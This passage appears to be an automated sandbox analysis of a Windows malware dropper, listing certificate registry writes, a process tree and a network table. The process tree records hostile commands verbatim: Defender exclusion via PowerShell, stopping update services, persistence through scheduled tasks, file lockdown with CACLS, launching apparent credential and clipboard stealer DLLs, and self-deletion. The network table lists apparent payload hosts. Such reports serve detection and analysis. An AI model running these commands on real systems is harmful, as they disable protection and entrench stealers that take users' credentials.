d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2 | C:\Users\Admin\Pictures\eszj1FzD5qG7Qoq4NGLteMV8.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 5c000000010000000400000000080000190000000100000010000000749966cecc95c1874194ca7203f9b6200300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d431d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0b000000010000001200000044006900670069004300650072007400000014000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f6200000001000000200000003e9099b5015e8f486c00bcea9d111ee721faba355a89bcf1df69561e3dc6325c090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b06010505070308530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c00f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa604000000010000001000000087ce0b7b2a0e4900e158719b37a893722000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2 | C:\Users\Admin\Pictures\eszj1FzD5qG7Qoq4NGLteMV8.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DDFB16CD4931C973A2037D3FC83A4D7D775D05E4 | C:\Users\Admin\Pictures\eszj1FzD5qG7Qoq4NGLteMV8.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DDFB16CD4931C973A2037D3FC83A4D7D775D05E4\Blob = 0f00000001000000300000004ea1b34b10b982a96a38915843507820ad632c6aad8343e337b34d660cd8366fa154544ae80668ae1fdf3931d57e1996530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b060105050703080b00000001000000320000004400690067006900430065007200740020005400720075007300740065006400200052006f006f0074002000470034000000620000000100000020000000552f7bdcf1a7af9e6ce672017f4f12abf77240c78e761ac203d1d9d20ac89988140000000100000014000000ecd7e382d2715d644cdf2e673fe7ba98ae1c0f4f1d0000000100000010000000a86dc6a233eb339610f3ed414927c559030000000100000014000000ddfb16cd4931c973a2037d3fc83a4d7d775d05e42000000001000000940500003082059030820378a0030201020210059b1b579e8e2132e23907bda777755c300d06092a864886f70d01010c05003062310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3121301f060355040313184469676943657274205472757374656420526f6f74204734301e170d3133303830313132303030305a170d3338303131353132303030305a3062310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3121301f060355040313184469676943657274205472757374656420526f6f7420473430820222300d06092a864886f70d01010105000382020f003082020a0282020100bfe6907368debbe45d4a3c3022306933ecc2a7252ec9213df28ad859c2e129a73d58ab769acdae7b1b840dc4301ff31ba43816eb56c6976d1dabb279f2ca11d2e45fd6053c520f521fc69e15a57ebe9fa95716595572af689370c2b2ba75996a733294d11044102edf82f30784e6743b6d71e22d0c1bee20d5c9201d63292dceec5e4ec893f821619b34eb05c65eec5b1abcebc9cfcdac34405fb17a66ee77c848a86657579f54588e0c2bb74fa730d956eeca7b5de3adc94f5ee535e731cbda935edc8e8f80dab69198409079c378c7b6b1c4b56a183803108dd8d437a42e057d88f5823e109170ab55824132d7db04732a6e91017c214cd4bcae1b03755d7866d93a31449a3340bf08d75a49a4c2e6a9a067dda427bca14f39b5115817f7245c468f64f7c169887698763d595d4276878997697a48f0e0a2121b669a74cade4b1ee70e63aee6d4ef92923a9e3ddc00e4452589b69a44192b7ec094b4d2616deb33d9c5df4b0400cc7d1c95c38ff721b2b211b7bb7ff2d58c702c4160aab1631844951a76627ef680b0fbe864a633d18907e1bdb7e643a418b8a67701e10f940c211db2542925896ce50e52514774be26acb64175de7aac5f8d3fc9bcd34111125be51050eb31c5ca72162209df7c4c753f63ec215fc420516b6fb1ab868b4fc2d6455f9d20fca11ec5c08fa2b17e0a2699f5e4692f981d2df5d9a9b21de51b0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e04160414ecd7e382d2715d644cdf2e673fe7ba98ae1c0f4f300d06092a864886f70d01010c05000382020100bb61d97da96cbe17c4911bc3a1a2008de364680f56cf77ae70f9fd9a4a99b9c9785c0c0c5fe4e61429560b36495d4463e0ad9c9618661b230d3d79e96d6bd654f8d23cc14340ae1d50f552fc903bbb9899696bc7c1a7a868a427dc9df927ae3085b9f6674d3a3e8f5939225344ebc85d03caed507a7d62210a80c87366d1a005605fe8a5b4a7afa8f76d359c7c5a8ad6a23899f3788bf44dd2200bde04ee8c9b4781720dc01432ef30592eaee071f256e46a976f92506d968d687a9ab236147a06f224b9091150d708b1b8897a8423614229e5a3cda22041d7d19c64d9ea26a18b14d74c19b25041713d3f4d7023860c4adc81d2cc3294840d0809971c4fc0ee6b207430d2e03934108521150108e85532de7149d92817504de6be4dd175acd0cafb41b843a5aad3c305444f2c369be2fae245b823536c066f67557f46b54c3f6e285a7926d2a4a86297d21ee2ed4a8bbc1bfd474a0ddf67667eb25b41d03be4f43bf40463e9efc2540051a08a2ac9ce78ccd5ea870418b3ceaf4988aff39299b6b3e6610fd28500e7501ae41b959d19a1b99cb19bb1001eefd00f4f426cc90abcee43fa3a71a5c84d26a535fd895dbc85621d32d2a02b54ed9a57c1dbfa10cf19b78b4a1b8f01b6279553e8b6896d5bbc68d423e88b51a256f9f0a680a0d61eb3bc0f0f537529aaea1377e4de8c8121ad07104711ad873d07d175bccff3667e | C:\Users\Admin\Pictures\eszj1FzD5qG7Qoq4NGLteMV8.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: LoadsDriver
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\is-4743J.tmp\lightcleaner.tmp | N/A |
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Processes
C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
C:\Users\Admin\AppData\Local\Temp\file.exe
"C:\Users\Admin\AppData\Local\Temp\file.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\SMSvcHost.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\SMSvcHost.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe"
C:\Users\Admin\Pictures\ZRBeoPgeGj8CxG9qYs8sjAht.exe
"C:\Users\Admin\Pictures\ZRBeoPgeGj8CxG9qYs8sjAht.exe"
C:\Users\Admin\Pictures\yfbdsjlje4JOSrr5jnDosrVb.exe
"C:\Users\Admin\Pictures\yfbdsjlje4JOSrr5jnDosrVb.exe"
C:\Users\Admin\Pictures\B1MtcJ18Lphr2749qh03SbWR.exe
"C:\Users\Admin\Pictures\B1MtcJ18Lphr2749qh03SbWR.exe"
C:\Users\Admin\Pictures\b8BD8mUZg1QzK4WHCOlyefC6.exe
"C:\Users\Admin\Pictures\b8BD8mUZg1QzK4WHCOlyefC6.exe"
C:\Users\Admin\Pictures\FDIwW1gq0WDUJMX44AqGq19O.exe
"C:\Users\Admin\Pictures\FDIwW1gq0WDUJMX44AqGq19O.exe"
C:\Users\Admin\Pictures\InrSNGhXx4T6LsNwqSxd93uX.exe
"C:\Users\Admin\Pictures\InrSNGhXx4T6LsNwqSxd93uX.exe"
C:\Users\Admin\Pictures\kepPL1XOY5LSSrh2bfHa1ijC.exe
"C:\Users\Admin\Pictures\kepPL1XOY5LSSrh2bfHa1ijC.exe"
C:\Users\Admin\Pictures\WmYtLkKaP9RNVnFfd1iN0jGZ.exe
"C:\Users\Admin\Pictures\WmYtLkKaP9RNVnFfd1iN0jGZ.exe"
C:\Users\Admin\AppData\Local\Temp\1ff8bec27e\nhdues.exe
"C:\Users\Admin\AppData\Local\Temp\1ff8bec27e\nhdues.exe"
C:\Users\Admin\AppData\Local\Temp\is-COA0R.tmp\InrSNGhXx4T6LsNwqSxd93uX.tmp
"C:\Users\Admin\AppData\Local\Temp\is-COA0R.tmp\InrSNGhXx4T6LsNwqSxd93uX.tmp" /SL5="$B01BC,491750,408064,C:\Users\Admin\Pictures\InrSNGhXx4T6LsNwqSxd93uX.exe"
C:\Users\Admin\Pictures\eszj1FzD5qG7Qoq4NGLteMV8.exe
C:\Users\Admin\Pictures\eszj1FzD5qG7Qoq4NGLteMV8.exe --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=103.0.4928.16 --initial-client-data=0x2e0,0x2e4,0x2e8,0x2bc,0x2ec,0x6fe58538,0x6fe58548,0x6fe58554
C:\Users\Admin\Pictures\eszj1FzD5qG7Qoq4NGLteMV8.exe
"C:\Users\Admin\Pictures\eszj1FzD5qG7Qoq4NGLteMV8.exe" --silent --allusers=0
C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\eszj1FzD5qG7Qoq4NGLteMV8.exe
"C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\eszj1FzD5qG7Qoq4NGLteMV8.exe" --version
C:\Windows\SysWOW64\schtasks.exe
"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN nhdues.exe /TR "C:\Users\Admin\AppData\Local\Temp\1ff8bec27e\nhdues.exe" /F
C:\Users\Admin\Pictures\eszj1FzD5qG7Qoq4NGLteMV8.exe
"C:\Users\Admin\Pictures\eszj1FzD5qG7Qoq4NGLteMV8.exe" --backend --install --import-browser-data=0 --enable-stats=1 --enable-installer-stats=1 --consent-given=0 --general-interests=0 --general-location=0 --personalized-content=0 --personalized-ads=0 --launchopera=1 --installfolder="C:\Users\Admin\AppData\Local\Programs\Opera" --profile-folder --language=en --singleprofile=0 --copyonly=0 --allusers=0 --setdefaultbrowser=1 --pintotaskbar=1 --pintostartmenu=1 --run-at-startup=1 --show-intro-overlay --server-tracking-data=server_tracking_data --initial-pid=4332 --package-dir-prefix="C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_20231004220046" --session-guid=4df762ca-d00d-4038-a583-2029e926e20c --server-tracking-blob=YThjMGRiYjdiNzhlM2E1OTE2ZjZmZDEyNGM5OWQyYzg1ZGMyNzNiOWQ0MTY3ZTM1N2NkNDFkZjdiNWE0NGUzMjp7ImNvdW50cnkiOiJVUyIsImluc3RhbGxlcl9uYW1lIjoiT3BlcmFTZXR1cC5leGUiLCJwcm9kdWN0Ijp7Im5hbWUiOiJvcGVyYSJ9LCJxdWVyeSI6Ii9vcGVyYS9zdGFibGUvd2luZG93cy8/dXRtX21lZGl1bT1hcGImdXRtX3NvdXJjZT1ta3QmdXRtX2NhbXBhaWduPTc2NyIsInN5c3RlbSI6eyJwbGF0Zm9ybSI6eyJhcmNoIjoieDg2XzY0Iiwib3BzeXMiOiJXaW5kb3dzIiwib3BzeXMtdmVyc2lvbiI6IjEwIiwicGFja2FnZSI6IkVYRSJ9fSwidGltZXN0YW1wIjoiMTY5NjQ1NjgzOS41ODk4IiwidXRtIjp7ImNhbXBhaWduIjoiNzY3IiwibWVkaXVtIjoiYXBiIiwic291cmNlIjoibWt0In0sInV1aWQiOiIxZjEwMjRjZi04ODExLTQzYzAtOTc5My00ZjU0OTViYjcxNzAifQ== --silent --desktopshortcut=1 --wait-for-package --initial-proc-handle=4005000000000000
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /k echo Y|CACLS "nhdues.exe" /P "Admin:N"&&CACLS "nhdues.exe" /P "Admin:R" /E&&echo Y|CACLS "..\1ff8bec27e" /P "Admin:N"&&CACLS "..\1ff8bec27e" /P "Admin:R" /E&&Exit
C:\Users\Admin\Pictures\eszj1FzD5qG7Qoq4NGLteMV8.exe
C:\Users\Admin\Pictures\eszj1FzD5qG7Qoq4NGLteMV8.exe --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=103.0.4928.16 --initial-client-data=0x2ec,0x2f0,0x2f4,0x2bc,0x2f8,0x6eba8538,0x6eba8548,0x6eba8554
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
C:\Users\Admin\AppData\Local\Temp\is-SKTLI.tmp\8758677____.exe
"C:\Users\Admin\AppData\Local\Temp\is-SKTLI.tmp\8758677____.exe" /S /UID=lylal220
C:\Users\Admin\AppData\Local\Temp\1000042051\s6.exe
"C:\Users\Admin\AppData\Local\Temp\1000042051\s6.exe"
C:\Users\Admin\AppData\Local\Temp\1ff8bec27e\nhdues.exe
C:\Users\Admin\AppData\Local\Temp\1ff8bec27e\nhdues.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo Y"
C:\Windows\SysWOW64\cacls.exe
CACLS "nhdues.exe" /P "Admin:N"
C:\Program Files\Microsoft Office 15\TFZIZKLLGT\lightcleaner.exe
"C:\Program Files\Microsoft Office 15\TFZIZKLLGT\lightcleaner.exe" /VERYSILENT
C:\Users\Admin\AppData\Local\Temp\5a-73843-b69-7dcb7-18de614ef0c69\Waegumeqolu.exe
"C:\Users\Admin\AppData\Local\Temp\5a-73843-b69-7dcb7-18de614ef0c69\Waegumeqolu.exe"
C:\Windows\SysWOW64\cacls.exe
CACLS "nhdues.exe" /P "Admin:R" /E
C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe
dw20.exe -x -s 808
C:\Users\Admin\AppData\Local\Temp\is-4743J.tmp\lightcleaner.tmp
"C:\Users\Admin\AppData\Local\Temp\is-4743J.tmp\lightcleaner.tmp" /SL5="$A020C,833775,56832,C:\Program Files\Microsoft Office 15\TFZIZKLLGT\lightcleaner.exe" /VERYSILENT
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo Y"
C:\Windows\SysWOW64\cacls.exe
CACLS "..\1ff8bec27e" /P "Admin:N"
C:\Windows\SysWOW64\cacls.exe
CACLS "..\1ff8bec27e" /P "Admin:R" /E
C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc
C:\Windows\System32\sc.exe
sc stop UsoSvc
C:\Windows\System32\sc.exe
sc stop WaaSMedicSvc
C:\Windows\System32\sc.exe
sc stop wuauserv
C:\Windows\System32\sc.exe
sc stop bits
C:\Windows\System32\sc.exe
sc stop dosvc
C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
C:\Windows\System32\schtasks.exe
C:\Windows\System32\schtasks.exe /delete /f /tn "GoogleUpdateTaskMachineQC"
C:\Windows\System32\powercfg.exe
powercfg /x -hibernate-timeout-ac 0
C:\Windows\System32\schtasks.exe
C:\Windows\System32\schtasks.exe /create /f /ru "System" /tn "GoogleUpdateTaskMachineQC" /xml "C:\Users\Admin\AppData\Local\Temp\xyvvnnvseiqa.xml"
C:\Windows\System32\powercfg.exe
powercfg /x -hibernate-timeout-dc 0
C:\Windows\System32\powercfg.exe
powercfg /x -standby-timeout-ac 0
C:\Windows\System32\schtasks.exe
C:\Windows\System32\schtasks.exe /run /tn "GoogleUpdateTaskMachineQC"
C:\Windows\System32\powercfg.exe
powercfg /x -standby-timeout-dc 0
C:\Program Files\Google\Chrome\updater.exe
"C:\Program Files\Google\Chrome\updater.exe"
C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202310042200461\assistant\Assistant_100.0.4815.21_Setup.exe_sfx.exe
"C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202310042200461\assistant\Assistant_100.0.4815.21_Setup.exe_sfx.exe"
C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202310042200461\assistant\assistant_installer.exe
"C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202310042200461\assistant\assistant_installer.exe" --version
C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202310042200461\assistant\assistant_installer.exe
"C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202310042200461\assistant\assistant_installer.exe" --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=100.0.4815.21 --initial-client-data=0x26c,0x270,0x274,0x248,0x278,0x25e8a0,0x25e8b0,0x25e8bc
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc
C:\Windows\System32\sc.exe
sc stop UsoSvc
C:\Windows\System32\sc.exe
sc stop WaaSMedicSvc
C:\Windows\System32\sc.exe
sc stop wuauserv
C:\Windows\System32\sc.exe
sc stop bits
C:\Windows\System32\sc.exe
sc stop dosvc
C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
C:\Windows\System32\schtasks.exe
C:\Windows\System32\schtasks.exe /create /f /ru "System" /tn "GoogleUpdateTaskMachineQC" /xml "C:\Windows\TEMP\xyvvnnvseiqa.xml"
C:\Windows\System32\powercfg.exe
powercfg /x -hibernate-timeout-ac 0
C:\Windows\System32\powercfg.exe
powercfg /x -hibernate-timeout-dc 0
C:\Windows\System32\powercfg.exe
powercfg /x -standby-timeout-ac 0
C:\Windows\System32\powercfg.exe
powercfg /x -standby-timeout-dc 0
C:\Windows\System32\conhost.exe
C:\Windows\System32\conhost.exe
C:\Windows\explorer.exe
C:\Windows\explorer.exe
C:\Windows\SysWOW64\rundll32.exe
"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\a967e0f403b652\cred64.dll, Main
C:\Windows\SysWOW64\rundll32.exe
"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\a967e0f403b652\clip64.dll, Main
C:\Windows\system32\rundll32.exe
"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\a967e0f403b652\cred64.dll, Main
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c start /I "" "C:\Users\Admin\AppData\Local\Temp\3594612327.exe"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c start /I "" "C:\Users\Admin\AppData\Local\Temp\0694413361.exe"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c start /I "" "C:\Users\Admin\AppData\Local\Temp\7004201895.exe"
C:\Users\Admin\AppData\Local\Temp\3594612327.exe
"C:\Users\Admin\AppData\Local\Temp\3594612327.exe"
C:\Users\Admin\AppData\Local\Temp\0694413361.exe
"C:\Users\Admin\AppData\Local\Temp\0694413361.exe"
C:\Users\Admin\AppData\Local\Temp\7004201895.exe
"C:\Users\Admin\AppData\Local\Temp\7004201895.exe"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c taskkill /im "s6.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\1000042051\s6.exe" & exit
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 584 -p 3360 -ip 3360
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 600 -p 1908 -ip 1908
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3360 -s 1876
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1908 -s 1876
C:\Windows\SysWOW64\taskkill.exe
taskkill /im "s6.exe" /f
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c taskkill /im "B1MtcJ18Lphr2749qh03SbWR.exe" /f & erase "C:\Users\Admin\Pictures\B1MtcJ18Lphr2749qh03SbWR.exe" & exit
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 636 -p 4752 -ip 4752
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4752 -s 1444
C:\Windows\SysWOW64\taskkill.exe
taskkill /im "B1MtcJ18Lphr2749qh03SbWR.exe" /f
C:\Windows\SysWOW64\rundll32.exe
"C:\Windows\syswow64\rundll32.exe" "C:\Windows\syswow64\shell32.dll",#61 C:\Users\Admin\AppData\Local\Temp\7004201895.exe
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 121.208.253.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 138.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 108.211.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 59.128.231.4.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 9.228.82.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | yip.su | udp |
| US | 8.8.8.8:53 | pastebin.com | udp |
| US | 104.20.67.143:443 | pastebin.com | tcp |
| DE | 148.251.234.93:443 | yip.su | tcp |
| US | 8.8.8.8:53 | flyawayaero.net | udp |
| US | 8.8.8.8:53 | downloads.digitalpulsedata.com | udp |
| US | 8.8.8.8:53 | ji.fhauiehgha.com | udp |
| US | 8.8.8.8:53 | jetpackdelivery.net | udp |
| US | 8.8.8.8:53 | bolidare.beget.tech | udp |
| US | 8.8.8.8:53 | d062.userscloud.net | udp |
| US | 104.21.93.225:443 | flyawayaero.net | tcp |
| RU | 5.42.64.10:80 | 5.42.64.10 | tcp |
| US | 8.8.8.8:53 | lycheepanel.info | udp |
| US | 85.217.144.143:80 | 85.217.144.143 | tcp |
| HK | 103.100.211.218:80 | ji.fhauiehgha.com | tcp |
| US | 8.8.8.8:53 | goboh2b.top | udp |
| US | 8.8.8.8:53 | net.geo.opera.com | udp |
| RU | 91.106.207.50:80 | bolidare.beget.tech | tcp |
| US | 85.217.144.143:80 | 85.217.144.143 | tcp |
| US | 188.114.96.0:443 | jetpackdelivery.net | tcp |
| DE | 168.119.140.62:443 | d062.userscloud.net | tcp |
| US | 8.8.8.8:53 | 41.110.16.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 143.67.20.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 93.234.251.148.in-addr.arpa | udp |
| US | 8.8.8.8:53 | link.storjshare.io | udp |
| US | 104.21.32.208:443 | lycheepanel.info | tcp |
| US | 136.0.77.2:443 | link.storjshare.io | tcp |
| US | 8.8.8.8:53 | justsafepay.com | udp |
| NL | 185.26.182.111:80 | net.geo.opera.com | tcp |
| US | 188.114.96.0:443 | justsafepay.com | tcp |
| US | 8.8.8.8:53 | potatogoose.com | udp |
| NL | 185.26.182.111:443 | net.geo.opera.com | tcp |
| RU | 45.8.228.16:80 | goboh2b.top | tcp |
| US | 8.8.8.8:53 | 225.93.21.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 143.144.217.85.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 10.64.42.5.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 0.96.114.188.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 208.32.21.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 62.140.119.168.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 50.207.106.91.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 2.77.0.136.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 111.182.26.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 218.211.100.103.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 43.58.199.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 16.228.8.45.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 241.154.82.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | z.nnnaajjjgc.com | udp |
| MU | 156.236.72.121:443 | z.nnnaajjjgc.com | tcp |
| US | 8.8.8.8:53 | 121.72.236.156.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 147.174.42.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 9.175.53.84.in-addr.arpa | udp |
| US | 136.0.77.2:80 | link.storjshare.io | tcp |
| US | 136.0.77.2:443 | link.storjshare.io | tcp |
| US | 8.8.8.8:53 | autoupdate.geo.opera.com | udp |
| NL | 185.26.182.124:443 | autoupdate.geo.opera.com | tcp |
| NL | 185.26.182.124:443 | autoupdate.geo.opera.com | tcp |
